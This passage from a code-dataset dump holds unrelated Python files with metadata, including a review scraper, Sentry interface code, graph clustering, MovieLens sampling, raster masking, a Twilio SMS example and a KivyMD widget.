\n","sub_path":"dags/dag_2_training.py","file_name":"dag_2_training.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"353550472","text":"import requests\nimport dryscrape\nfrom bs4 import BeautifulSoup\n\ndef get_drysoup(url):\n\tprint(url)\n\tsession = dryscrape.Session()\n\tsession.set_timeout(60)\n\tsession.visit(url)\n\tpage = session.body()\n\tsoup = BeautifulSoup(page,'html.parser')\n\treturn soup\ndef get_soup(url):\n\tprint(url)\n\t#page = urllib.request.urlopen(url)\n\tpage = requests.get(url)\n\tsoup = BeautifulSoup(page.text,'html.parser')\n\treturn soup\n\t\n\nclass ConsumerAffairs(object):\n\n\tdef 
__init__(self):\n\t\tself.urls = []\n\n\tdef start_scraping(self, searchterm):\n\t\turl = \"https://www.consumeraffairs.com/search.html?q=\"+searchterm\n\t\tlist = []\n\t\tself.getReviews(url, list)\n\t\tprint(\"****************************************************\",len(list))\n\t\treturn list\t\t\n\n\tdef getReviews(self, url, list):\n\t\tsoup = get_drysoup(url)\n\t\taddr = self.getAddress(soup)\n\t\tres = soup.find(id=\"___gcse_0\")\n\t\t#print(res.findAll(\"a\",{\"class\":\"gs-title\"}))\n\t\tfor item in res.findAll(\"a\",{\"class\":\"gs-title\"}):\n\t\t\td_url = item['href']\n\t\t\tif d_url in self.urls:\n\t\t\t\tcontinue\n\t\t\telse:\t\t\n\t\t\t\tself.urls.append(d_url)\t\n\t\t\t\tdetail = get_soup(d_url)\n\t\t\treviews = detail.findAll(\"div\",{\"class\":\"review--user-post\"})\n\t\t\tprint(len(reviews))\n\t\t\tfor r in reviews:\n\t\t\t\tdict = {}\n\t\t\t\tdict[\"name\"] = r.find(\"span\",{\"class\":\"review__author-name\"}).find(text=True)\n\t\t\t\tdict[\"date\"] = r.find(\"span\",{\"class\":\"review__post-date\"}).find(text=True)\n\t\t\t\tdict[\"title\"] = \"\"\n\t\t\t\tdict[\"content\"] = r.find(\"div\",{\"class\":\"review__body\"}).find('p').find(text=True, recursive=True)\n\t\t\t\tdict[\"address\"] = \"\"\n\t\t\t\tlist.append(dict)\n\t\t\t\t\t\t\n\t\tnextPage = self.getUrl(soup)\n\t\tif nextPage is not None:\n\t\t\tself.getReviews(nextPage, list)\n\t\t\t\t\n\t\tprint(list)\n\t\treturn list\n\n\n\tdef getAddress(self, soup):\n\t\ttry:\n\t\t\treturn \"\\n\".join(soup.find('div',{'itemprop':'address'}).stripped_strings)\n\t\texcept AttributeError:\n\t\t\treturn \"\"\n\n\tdef getUrl(self, soup):\n\t\tif soup.find(\"div\",{\"class\":\"review--user-post\"}) is not None:\n\t\t\treturn \"https://www.consumeraffairs.com/\"+soup.find('a',{'class':'next'})['href']\n\t\telse:\n\t\t\treturn None\n\n\n","sub_path":"apps/mentions/scraping/consumeraffairs.py","file_name":"consumeraffairs.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}{"seq_id":"34507442","text":"from __future__ import absolute_import\n\nfrom sentry.interfaces.base import Interface\nfrom sentry.interfaces.stacktrace import Stacktrace\nfrom sentry.utils.safe import trim\n\n__all__ = ('Threads',)\n\n\nclass Threads(Interface):\n score = 1900\n\n @classmethod\n def to_python(cls, data):\n threads = []\n\n for thread in data.get('values') or ():\n stacktrace = thread.get('stacktrace')\n if stacktrace is not None:\n stacktrace = Stacktrace.to_python(stacktrace,\n slim_frames=True)\n threads.append({\n 'stacktrace': stacktrace,\n 'id': trim(thread.get('id'), 40),\n 'crashed': bool(thread.get('crashed')),\n 'current': bool(thread.get('current')),\n 'name': trim(thread.get('name'), 200),\n })\n\n return cls(values=threads)\n\n def to_json(self):\n def export_thread(data):\n rv = {\n 'id': data['id'],\n 'current': data['current'],\n 'crashed': data['crashed'],\n 'name': data['name'],\n 'stacktrace': None,\n }\n if data['stacktrace']:\n rv['stacktrace'] = data['stacktrace'].to_json()\n return rv\n\n return {\n 'values': [export_thread(x) for x in self.values],\n }\n\n def get_api_context(self, is_public=False):\n def export_thread(data):\n rv = {\n 'id': data['id'],\n 'current': data['current'],\n 'crashed': data['crashed'],\n 'name': data['name'],\n 'stacktrace': None,\n }\n if data['stacktrace']:\n rv['stacktrace'] = data['stacktrace'].get_api_context(\n is_public=is_public)\n return rv\n\n return {\n 'values': [export_thread(x) for x in
self.values],\n }\n\n def get_path(self):\n return 'threads'\n","sub_path":"src/sentry/interfaces/threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"567994059","text":"import networkx as nx\nimport numpy as np\nimport sys\nfrom ba.UtilityClasses import ColType\nimport time\n\nclass GraphClustering:\n\n def __init__(self):\n self.preset_number_of_clusters = None\n self.nearest_neighbour_indices = None\n self.border_points = None\n self.connection_matrix_ = None\n self.sub_connection_matrix_ = None\n self.edges_ = None\n self.graph_ = None\n self.sub_graphs_ = None\n self.graph_clustering_name_ = None\n\n def perform_sub_graph_clustering(self, data_frame, nearest_neighbour_indices, border_points):\n self.nearest_neighbour_indices = nearest_neighbour_indices\n self.border_points = border_points\n self.connection_matrix_ = self._compute_connection_matrix(nearest_neighbour_indices)\n self.sub_connection_matrix_ = self._compute_sub_connection_matrix(border_points, self.connection_matrix_)\n self.edges_ = self._compute_edges(self.sub_connection_matrix_)\n self.graph_ = self._compute_graph(data_frame.df, self.edges_, data_frame.dimensions)\n self.sub_graphs_ = self._compute_sub_graphs(self.graph_)\n\n self.graph_clustering_name_ = self._compute_graph_clustering(self.sub_graphs_, data_frame)\n return self\n\n def perform_sub_graph_clustering_preset_k(self, number_of_clusters, data_frame, nearest_neighbour_indices, border_points_order):\n self.preset_number_of_clusters = number_of_clusters\n self.nearest_neighbour_indices = nearest_neighbour_indices\n self.connection_matrix_ = self._compute_connection_matrix(nearest_neighbour_indices)\n self.edges_ = self._compute_edges(self.connection_matrix_)\n self.graph_ = self._compute_graph(data_frame.df, self.edges_, data_frame.dimensions)\n\n self.graph_ = self._reduce_to_fixed_k(data_frame.df, self.graph_, number_of_clusters, border_points_order)\n self.sub_graphs_ = self._compute_sub_graphs(self.graph_)\n self.graph_clustering_name_ = self._compute_graph_clustering(self.sub_graphs_, data_frame)\n return self\n\n @staticmethod\n def _compute_connection_matrix(nearest_neighbour_indices):\n point_count = nearest_neighbour_indices.shape[0]\n connection_matrix = np.zeros((point_count, point_count))\n for point_array in nearest_neighbour_indices:\n for point in point_array:\n connection_matrix[point_array[0]][point] = 1\n return connection_matrix\n\n @staticmethod\n def _compute_sub_connection_matrix(border_pts, connection_matrix):\n sub_connection_matrix = connection_matrix[:]\n for border_pt in border_pts:\n sub_connection_matrix[border_pt] = np.zeros(connection_matrix[border_pt].shape[0])\n return sub_connection_matrix\n\n @staticmethod\n def _compute_edges(sub_connection_matrix):\n edges = []\n for index, row in enumerate(sub_connection_matrix):\n for idx, point in enumerate(row):\n if point != 0:\n edges.append((index, idx))\n return edges\n\n @staticmethod\n def _compute_graph(df, edges, dimensions):\n g = nx.Graph()\n col_names = list(df.columns.values)[0:dimensions]\n for index, row in df.iterrows():\n col_dict = {}\n for i in range(0, dimensions):\n col_dict[\"a\"+str(i)] = row[col_names[i]]\n g.add_node(index, data=col_dict)\n g.add_edges_from(edges)\n return g\n\n @staticmethod\n def _compute_sub_graphs(graph):\n d = list(nx.connected_component_subgraphs(graph))\n return d\n\n @staticmethod\n def 
_compute_graph_clustering(sub_graphs, data_frame):\n\n clustering_name = \"graph_clustering \" + str(time.process_time())\n\n data_frame.add_result_name(clustering_name, -2, ColType.CLUSTER_LABEL)\n\n i = 1\n for sub_graph in sub_graphs:\n if len(sub_graph) > 1:\n for node in sub_graph.nodes:\n data_frame.add_result(clustering_name, node, i)\n i += 1\n else:\n for node in sub_graph.nodes:\n data_frame.add_result(clustering_name, node, -1)\n return clustering_name\n\n def _reduce_to_fixed_k(self, df, graph, fixed_number_of_clusters, border_points_order):\n\n sub_clusters = GraphClustering._compute_sub_graphs(graph)\n sub_clusters_without_noise = [x for x in sub_clusters if len(x) > 1]\n current_number_of_clusters = len(sub_clusters_without_noise)\n\n while current_number_of_clusters < fixed_number_of_clusters and len(border_points_order) > 0:\n\n to_remove = border_points_order.pop(0)\n edges_to_remove = [edge for edge in graph.edges if edge[0] == to_remove]\n graph.remove_edges_from(edges_to_remove)\n\n sub_clusters = GraphClustering._compute_sub_graphs(graph)\n sub_clusters_without_noise = [x for x in sub_clusters if len(x) > 1]\n current_number_of_clusters = len(sub_clusters_without_noise)\n\n self.edges_ = graph.edges\n return graph\n","sub_path":"Python Code/ba/GraphSearch.py","file_name":"GraphSearch.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"467318660","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 27 14:03:58 2017\n\n@author: sherryluo\n\"\"\"\n\nimport numpy as np\n\nnum_samples = 50\nsample_size = 100\n\ndef create_samples(data_mat):\n\n def draw100(data_mat):\n # randomly draw 100 ratings with replacement\n test_ind = np.random.randint(0, high=data_mat.shape[0], size=sample_size)\n test = data_mat[test_ind]\n \n # the remained ratings serve as prior set\n prior_ind = range(data_mat.shape[0])\n prior_ind = np.setdiff1d(prior_ind, test_ind)\n prior = data_mat[prior_ind]\n return test, prior\n \n tests = []\n for i in range(num_samples):\n test, prior = draw100(data_mat)\n filename = 'prior{}.txt'.format(i)\n with open(filename, 'wb') as f:\n np.savetxt(f, prior.astype(int), fmt='%i', delimiter='\\t')\n tests.append(test)\n \n tests = np.vstack(tests)\n filename2 = 'tests.txt'\n with open(filename2, 'wb') as f2:\n np.savetxt(f2, tests.astype(int), fmt='%i', delimiter='\\t')\n\ndef main():\n datafile = 'ml-100k/u.data'\n u_data = np.loadtxt(datafile, dtype=int)\n u_data = u_data[:, :-1]\n create_samples(u_data)\n \nmain()","sub_path":"collaborative-filtering/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"357222787","text":"\"\"\"\nA set of request processors that return dictionaries to be merged into a\ntemplate context. 
Each function takes the request object as its only parameter\nand returns a dictionary to add to the context.\n\nThese are referenced from the setting TEMPLATE_CONTEXT_PROCESSORS and used by\nRequestContext.\n\"\"\"\nfrom settings import SEAFILE_VERSION, SITE_TITLE, SITE_NAME, SITE_BASE, \\\n ENABLE_SIGNUP, MAX_FILE_NAME\ntry:\n from settings import BUSINESS_MODE\nexcept ImportError:\n BUSINESS_MODE = False\n\ntry:\n from settings import ENABLE_FILE_SEARCH\nexcept ImportError:\n ENABLE_FILE_SEARCH = False\n\ndef base(request):\n \"\"\"\n Add seahub base configuration to the context.\n \n \"\"\"\n try:\n org = request.user.org\n except AttributeError:\n org = None\n try:\n base_template = request.base_template\n except AttributeError:\n base_template = 'myhome_base.html'\n\n return {\n 'seafile_version': SEAFILE_VERSION,\n 'site_title': SITE_TITLE,\n 'business_mode': BUSINESS_MODE,\n 'cloud_mode': request.cloud_mode,\n 'org': org,\n 'base_template': base_template,\n 'site_name': SITE_NAME,\n 'enable_signup': ENABLE_SIGNUP,\n 'max_file_name': MAX_FILE_NAME,\n 'enable_file_search': ENABLE_FILE_SEARCH,\n }\n\n","sub_path":"base/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}{"seq_id":"642062645","text":"# def main():\n# numYearBase10 = 2011\n# numYearBase8 = 0o3733\n# numYearBase16 = 0x7DB\n\n# print(\"Year by base 10 : %d, by base 8 : %d, by base 16 : %d\" %(numYearBase10, numYearBase8, numYearBase16))\n\n# numComplex1 = complex(3,4)\n# numComplex2 = 4+3j\n\n# print(\"complex value : \", numComplex1)\n# print(\"Absolute value : \", abs(numComplex2))\n# print(\"Real value : \", numComplex2.real)\n# print(\"Image value : \", numComplex2.imag)\n\n# strDeptName = \"Industrial & Systems Engineering\"\n# strUnivName = \"KAIST\"\n# print(\"Department : \", strDeptName)\n# print(\"Full name or dept : \", (strDeptName+\", \"+strUnivName))\n\n# main()\n\ndef main():\n numTest1 = 10\n numTest2 = 3.0\n numPlus = numTest1 + numTest2\n numMinus = numTest1 - numTest2\n numMultiply = numTest1 * numTest2\n numDivide = numTest1 / numTest2\n numModulo = numTest1 % numTest2\n print(\"{0}, {1}, {2}, {3}, {4}\".format(numPlus, numMinus, numMultiply, numDivide, numModulo))\n \n numDivideInt = numTest1 / int(numTest2)\n print(numDivide, numDivideInt) # in python3 both print the same value\n # to get an integer result, use // instead of /\n\n numTest2, numTest1 = numTest1, numTest2 # swapping statement\n print(numTest1,numTest2)\n\n print(numTest1 == numTest2)\n print(numTest1 != numTest2)\n print(type(numTest1))\n\n numTest1 = str(numTest1)\n print(type(numTest1), numTest1)\n\n strformula = \"2011 / 7\"\n print(eval(strformula))\n\nmain()","sub_path":"실습/example1-4.py","file_name":"example1-4.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}{"seq_id":"251361445","text":"'''\nThis module provides classes to facilitate processing of GriB data using PyGrib\n\nJavier.Delgado@noaa.gov\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\nimport pygrib\nimport logging as log\n\n\nDEFAULT_CONTOUR_LINE_PLOT_COLOR = 'black'\nDEFAULT_COLOR_MAP = plt.cm.jet\n\nclass GribMessage:\n ''' \n Very light-weight encapsulation of a GriB message. Currently, it\n just stores its name, lats, lons, and values. \n The PyGrib grib message is optionally stored as well. 
This is \n optional since it may take too much memory.\n The class provides methods for plotting the values onto an existing\n Basemap object as a contour or filled contour.\n '''\n def __init__(self, param_name, level, lats, lons, values, plotType, \n grib_message=None, **kwargs):\n self.param_name = param_name # should match parameterName attribute of grib file\n self.level = level\n self.lats = lats\n self.lons = lons\n self.values = values\n self.plot_type = plotType\n if grib_message is not None:\n self.grib_message = grib_message\n\n def plot_contour_lines(self, basemap, colors=DEFAULT_CONTOUR_LINE_PLOT_COLOR):\n '''\n Make a contour plot from the GriB message's values onto the given \n Basemap object\n '''\n #small = np.min(self.values)\n #large = np.max(self.values)\n x,y = basemap(self.lons, self.lats)\n # use linspace arg to control how many bins to break the color map into\n #cs = map.contour(x, y, self.values, np.linspace(small,large,11), colors=colors )\n cs = basemap.contour(x, y, self.values, colors=colors ) \n plt.clabel(cs, inline=1, fontsize=10) # put values in contour lines\n\n def plot_contours(self, basemap):\n '''\n Make a filled contour plot from the grib message's values onto the\n given basemap object\n ''' \n x,y = basemap(self.lons, self.lats)\n rangeMin = np.min(self.values)\n rangeMax = np.max(self.values)\n #cs = m.contourf(x,y,self.values, np.linspace(rangeMax,rangeMin,11), cmap=plt.cm.jet )\n cs = basemap.contourf(x,y,self.values, cmap=DEFAULT_COLOR_MAP )\n cb = basemap.colorbar()\n \n","sub_path":"nwpy/dataproc/grib/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}{"seq_id":"346733411","text":"# Uses python3\nimport functools\nimport sys\n@functools.lru_cache(None)\ndef fib(n):\n if n<2:\n return n\n return fib(n-1) + fib(n-2)\nif __name__ == '__main__':\n #input = sys.stdin.read()\n n = int(input())\n m= (n+2) %60\n #print((fib(n+2)-1)%10)\n answer = fib(m)%10\n # the sum of the first n Fibonacci numbers is F(n+2) - 1, so a last digit of 0 must wrap to 9\n print((answer - 1) % 10)\n #print((fib(m)%10)-1)\n","sub_path":"Algorithmic-ToolBox/week2_algorithmic_warmup/6_last_digit_of_the_sum_of_fibonacci_numbers/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}{"seq_id":"482352450","text":"import json\nimport re\n\n\ndef read_and_add():\n with open(\"input12.txt\") as f:\n values = f.read()\n r = re.compile(r\"-?\\d+\")\n numbers = r.findall(values)\n sum = 0\n for num in numbers:\n sum += int(num)\n return sum\n\n\ndef read_and_add2():\n with open(\"input12.txt\") as f:\n j = json.load(f)\n\n s = do_sum(j, ignore_red=True)\n print(s)\n\n\ndef do_sum(arg, ignore_red=False):\n sum_value = 0\n\n if type(arg) is str:\n sum_value += sum_string(arg)\n elif type(arg) is int:\n sum_value += arg\n elif type(arg) is list:\n sum_value += sum([do_sum(x, ignore_red) for x in arg])\n elif type(arg) is dict:\n if ignore_red and \"red\" in arg.values():\n return 0\n else:\n for k, v in arg.items():\n sum_value += do_sum(v, ignore_red)\n\n return sum_value\n\n\ndef sum_string(s):\n c = 0\n try:\n c = int(s)\n except ValueError:\n pass\n\n return c\n","sub_path":"2015/python/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}{"seq_id":"1525803","text":"# Create a Student class and initialize it with name and roll number. 
Make methods to :\n# 1. Display - It should display all informations of the student.\n# 2. setAge - It should assign age to student\n# 3. setMarks - It should assign marks to the student.\nfrom datetime import datetime\n\n\nclass Myclass:\n def __init__(self, firstname, lastname, birthday, roll_no):\n self.firstname = firstname\n self.lastname = lastname\n self.birthday = birthday\n self.roll_no = roll_no\n\n def studInfo(self):\n info = {\n \"Fullname\": self.firstname + \" \" + self.lastname,\n \"Birthday\": self.birthday,\n \"Roll Number\": self.roll_no,\n }\n return info\n\n def setAge(self):\n bday = self.birthday.split(\"-\")\n birth = datetime(int(bday[2]), int(bday[0]), int(bday[1]))\n total_days = datetime.today() - birth\n age_obj = str(total_days / 365).split(\" \")\n age = age_obj[0]\n return age + \" \" + \"y/o\"\n\n def setMarks(self, english, math, filipino):\n total = english + math + filipino\n total_mark = total / 3\n return f\"Grade : {total_mark:.1f}\"\n\n\n# x = Myclass('Sheriline', 'Malaca', '03-03-1998', '123421')\n\n# info = x.studInfo()\n# for i in info:\n# print(f'{i} : {info[i]}')\n\n# age = x.setAge()\n# print(f'Age : {age}')\n\n# marks = x.setMarks(80, 85, 89)\n# print(marks)\n\n# Output:\n# Fullname : Sheriline Malaca\n# Birthday : 03-03-1998\n# Roll Number : 123421\n# Age : 21 y/o\n# Grade : 84.7\n\n#######################################################################\n\n# class Derive(Myclass):\n# # print(Myclass('asasasa', 'asasa', '2-2-1997', '2131313'))\n# pass\n\n# print(Myclass('asasasa', 'asasa', '2-2-1997', '2131313').birthday) #2-2-1997\n","sub_path":"D9/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"388185650","text":"from twilio.rest import TwilioRestClient\n\naccount_sid = \"Avg900\" # Your Live Credentials Account SID from www.twilio.com/console\nauth_token = \"b567tht\" # Your Live Credentials Auth Token from www.twilio.com/console\n\nclient = TwilioRestClient(account_sid, auth_token)\n\nmessage = client.messages.create(\n body=\"Hello from python.\",\n to=\"verified_number\", # Replace with your phone number\n from_=\"twilio_number\") # Replace with your Twilio number\n\nprint(message.sid)\n","sub_path":"send_text.py","file_name":"send_text.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"79922295","text":"# %load q01_outlier_removal/build.py\n# Default imports\nimport pandas as pd\nimport numpy as np\n\nloan_data = pd.read_csv('data/loan_prediction_uncleaned.csv')\nloan_data = loan_data.drop('Loan_ID', 1)\n\nloan_data\n\ndef outlier_removal(loan_data):\n loan_data1=loan_data.loc[:,['ApplicantIncome','CoapplicantIncome','LoanAmount']]\n loan_data1=loan_data1.dropna()\n loan_data2=loan_data1.sort_values(['ApplicantIncome','CoapplicantIncome','LoanAmount'])\n upper_quartile = np.percentile(loan_data2,95)\n h2=loan_data[loan_data2=': operator.ge,\n '>': operator.gt\n }\n operation = ops.get(op)\n return operation(arg1, arg2)\n\n\ndef create_mask(in_path, band, operator, threshold, write=True, out_dir=None,\n show_output=False,):\n \"\"\"Masking a raster with a given threshold and operatorself.\n\n Creates a a binary output raster in GTiff format. 
Keeps the input filename\n and adds the suffix '_mask'.\n\n Args:\n in_path (str): full path to input raster for rasterio.open().\n band (int): band number.\n operator (str): select one of '>', '>=', '<', '<=',\n '==', '!='.\n threshold (number): to define the split.\n write (bool): If True, write output to disk.\n out_dir (str): Output directory. If None, outputs will be written along\n input files.\n show_output (bool): If True, plotting the output mask.\n\n Returns:\n mask (ndarray): binary raster [0, 1].\n profile (rasterio profile): to reestablish geographic reference.\n\n Example:\n # files = os.listdir(in_dir)\n # for f in (f for f in files if f.lower().endswith('.tif')\n # create_mask(f, 2, '<', -17, write=True, out_dir='data\\\\output')\n\n TODO:\n * Transform is provided inside profile?\n \"\"\"\n with rio.open(in_path) as src:\n profile = src.profile\n\n try:\n arr = src.read(band)\n except IndexError:\n print(f'WARNING: band index of {in_path} not existing.'\n 'Will be skipped.')\n return None\n\n ras_mask = _cmp(arr, operator, threshold)\n\n if write:\n if out_dir:\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n _, fname = os.path.split(in_path)\n out_path = join(out_dir, fname[:-4] + '_mask.tif')\n else:\n out_path = in_path[:-4] + '_mask.tif'\n profile.update(\n dtype=rio.uint8,\n count=1,\n compress='lzw',\n nodata=None)\n with rio.open(out_path, 'w', **profile) as dst:\n dst.write(mask.astype(rio.uint8), 1)\n\n if show_output:\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 9))\n show(arr, ax=ax1, cmap='gray', vmin=-25, vmax=0, title='b1')\n show(mask, ax=ax2, cmap='gray', vmin=0, vmax=1, title='mask')\n plt.show()\n\n return ras_mask, profile\n\n\n# if __name__ == '__main__':\n\ngdal.UseExceptions()\n\nhome_dir = 'D:\\\\nw\\\\ws\\\\sarpy'\ndlm_dir = 'D:\\\\nw\\\\04_Geodaten\\\\Basis-DLM\\\\basis-dlm_EPSG25832_Shape'\nshp_path = join(dlm_dir, 'gew01_f.shp')\nshp = gpd.read_file(shp_path)\n\nras_path = join(home_dir, 'Intensity',\n 'Intensity_S1A_IW_SLC__1SDV_20180118T171647_'\n '20180118T171715_020212_0227CA_B637.tif')\nras_path = (\"D:\\\\nw\\\\ws\\\\sarpy\\\\data\\\\\"\n \"Intensity_S1B_IW_SLC__1SDV_20180105T172405_7EE6_clip.tif\")\n\n\n# extract the geometry in GeoJSON format\ngeoms = shp.geometry.values # list of shapely geometries\ngeometry = geoms[0] # shapely geometry\ngeoms = [mapping(geoms[0])]\n# extract the raster values values within the polygon\nwith rasterio.open(ras_path) as src:\n profile = src.profile\n transform = src.transform\n arr = src.read([1, 2, 1])\n\n # rio.plot.show(arr)\n\n # out_image, out_transform = mask(src, geoms, crop=True)\n\nstats = quicklook(ras_path)\n# print(stats)\n# print(arr.shape)\n# rio.plot.show(arr/-25, transform=transform)\n\n\n# shp = shp.to_crs(crs)\n#\n# plt.show()\n","sub_path":"sentools2/dev_sar.py","file_name":"dev_sar.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"474769152","text":"\"\"\"\nComponents/User Animation Card\n==============================\n\nExample\n-------\n\n.. 
code-block:: python\n\n from kivymd.app import MDApp\n from kivy.lang import Builder\n from kivy.factory import Factory\n\n from kivymd.toast import toast\n from kivymd.theming import ThemeManager\n from kivymd.uix.useranimationcard import MDUserAnimationCard\n from kivymd.uix.button import MDIconButton\n from kivymd.uix.list import ILeftBodyTouch\n\n # Your content for a contact card.\n Builder.load_string('''\n #:import get_hex_from_color kivy.utils.get_hex_from_color\n\n\n \n orientation: 'vertical'\n padding: dp(10)\n spacing: dp(10)\n adaptive_height: True\n\n MDBoxLayout:\n adaptive_height: True\n\n Widget:\n MDRoundFlatButton:\n text: \"Free call\"\n Widget:\n MDRoundFlatButton:\n text: \"Free message\"\n Widget:\n\n OneLineIconListItem:\n text: \"Video call\"\n IconLeftSampleWidget:\n icon: 'camera-front-variant'\n\n TwoLineIconListItem:\n text: \"Call Viber Out\"\n secondary_text: \"[color=%s]Advantageous rates for calls[/color]\" % get_hex_from_color(app.theme_cls.primary_color)\n IconLeftSampleWidget:\n icon: 'phone'\n\n TwoLineIconListItem:\n text: \"Call over mobile network\"\n secondary_text: \"[color=%s]Operator's tariffs apply[/color]\" % get_hex_from_color(app.theme_cls.primary_color)\n IconLeftSampleWidget:\n icon: 'remote'\n ''')\n\n\n class IconLeftSampleWidget(ILeftBodyTouch, MDIconButton):\n pass\n\n\n class Example(MDApp):\n title = \"Example Animation Card\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.user_animation_card = None\n\n def build(self):\n def main_back_callback():\n toast('Close card')\n\n if not self.user_animation_card:\n self.user_animation_card = MDUserAnimationCard(\n user_name=\"Lion Lion\",\n path_to_avatar=\"./assets/african-lion-951778_1280.jpg\",\n callback=main_back_callback)\n self.user_animation_card.box_content.add_widget(\n Factory.TestAnimationCard())\n self.user_animation_card.open()\n\n\n Example().run()\n\"\"\"\n\n\nfrom kivy.animation import Animation\nfrom kivy.clock import Clock\nfrom kivy.core.window import Window\nfrom kivy.lang import Builder\nfrom kivy.metrics import dp, sp\nfrom kivy.properties import ListProperty, ObjectProperty, StringProperty\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.modalview import ModalView\n\nfrom kivymd.theming import ThemableBehavior\nfrom kivymd.uix.behaviors import SpecificBackgroundColorBehavior\nfrom kivymd.uix.button import MDIconButton\n\nBuilder.load_string(\n \"\"\"\n#:import Window kivy.core.window.Window\n#:import StiffScrollEffect kivymd.stiffscroll.StiffScrollEffect\n\n\n\n size_hint_y: None\n height: root.theme_cls.standard_increment\n padding: [root.theme_cls.horizontal_margins - dp(12), 0]\n\n BoxLayout:\n id: left_actions\n orientation: 'horizontal'\n size_hint_x: None\n padding: [0, (self.height - dp(48))/2]\n\n BoxLayout:\n padding: dp(12), 0\n\n MDLabel:\n font_style: 'H6'\n opposite_colors: root.opposite_colors\n theme_text_color: 'Custom'\n text_color: root.specific_text_color\n text: root.title\n shorten: True\n shorten_from: 'right'\n\n BoxLayout:\n id: right_actions\n orientation: 'horizontal'\n size_hint_x: None\n padding: [0, (self.height - dp(48))/2]\n\n\n\n canvas:\n Color:\n rgba:\n root.theme_cls.bg_dark \\\n if root.theme_cls.theme_style == 'Dark' \\\n else root.theme_cls.bg_light\n Rectangle:\n size: self.size\n pos: self.pos\n\n FitImage:\n id: image\n source: root.path_to_avatar\n size_hint: 1, None\n height: Window.height * 40 // 100\n y: Window.height - self.height\n allow_stretch: 
True\n keep_ratio: False\n\n canvas.after:\n Color:\n rgba: root._primary_color\n Rectangle:\n size: self.size\n pos: self.pos\n\n MDLabel:\n id: user_name\n font_style: 'H4'\n theme_text_color: 'Custom'\n color: 1, 1, 1, 1\n shorten: True\n shorten_from: 'right'\n text: root.user_name\n size_hint_y: None\n height: self.texture_size[1]\n\n ModifiedToolbar:\n id: toolbar\n md_bg_color: 0, 0, 0, 0\n left_action_items: [['arrow-left', lambda x: root._callback_back()]]\n y: Window.height - self.height\n\n ScrollView:\n id: scroll\n y: -image.height\n effect_cls: StiffScrollEffect\n scroll_distance: 100\n\n canvas.before:\n Color:\n rgba:\n root.theme_cls.bg_dark\n Rectangle:\n size: self.size\n pos: self.pos\n\n MDGridLayout:\n id: box_content\n adaptive_height: True\n cols: 1\n\n canvas:\n Color:\n rgba:\n root.theme_cls.bg_dark\n Rectangle:\n size: self.size\n pos: self.pos\n\"\"\"\n)\n\n\nclass MDUserAnimationCard(ThemableBehavior, ModalView):\n user_name = StringProperty()\n path_to_avatar = StringProperty()\n box_content = ObjectProperty()\n callback = ObjectProperty()\n _anim_bottom = True\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self._primary_color = self.theme_cls.primary_color\n self._primary_color[3] = 0\n self.user_animation_card = UserAnimationCard(\n user_name=self.user_name,\n path_to_avatar=self.path_to_avatar,\n _callback_back=self._callback_back,\n _primary_color=self._primary_color,\n )\n self.user_animation_card.ids.user_name.pos = (\n dp(15),\n Window.height - self.user_animation_card.ids.image.height,\n )\n self.box_content = self.user_animation_card.ids.box_content\n self.add_widget(self.user_animation_card)\n\n self._obj_avatar = self.user_animation_card.ids.image\n self._obj_user_name = self.user_animation_card.ids.user_name\n self._obj_toolbar = self.user_animation_card.ids.toolbar\n self._obj_scroll = self.user_animation_card.ids.scroll\n self._set_current_pos_objects()\n\n def _callback_back(self):\n self.dismiss()\n if self.callback:\n self.callback()\n\n def on_open(self):\n self._primary_color = self.theme_cls.primary_color\n self._primary_color[3] = 0\n self.user_animation_card._primary_color = self._primary_color\n\n def _set_current_pos_objects(self):\n self._avatar_y = self._obj_avatar.y\n self._toolbar_y = self._obj_toolbar.y\n self._user_name_y = self._obj_user_name.y\n self._scroll_y = self._obj_scroll.y\n\n def on_touch_move(self, touch):\n if touch.ud[\"swipe_begin\"] < touch.y:\n if self._anim_bottom:\n self._anim_bottom = False\n self.animation_to_top()\n else:\n if not self._anim_bottom:\n self._anim_bottom = True\n self.animation_to_bottom()\n\n def on_touch_down(self, touch):\n touch.ud[\"swipe_begin\"] = touch.y\n return super().on_touch_down(touch)\n\n def on_touch_up(self, touch):\n touch.ud[\"swipe_begin\"] 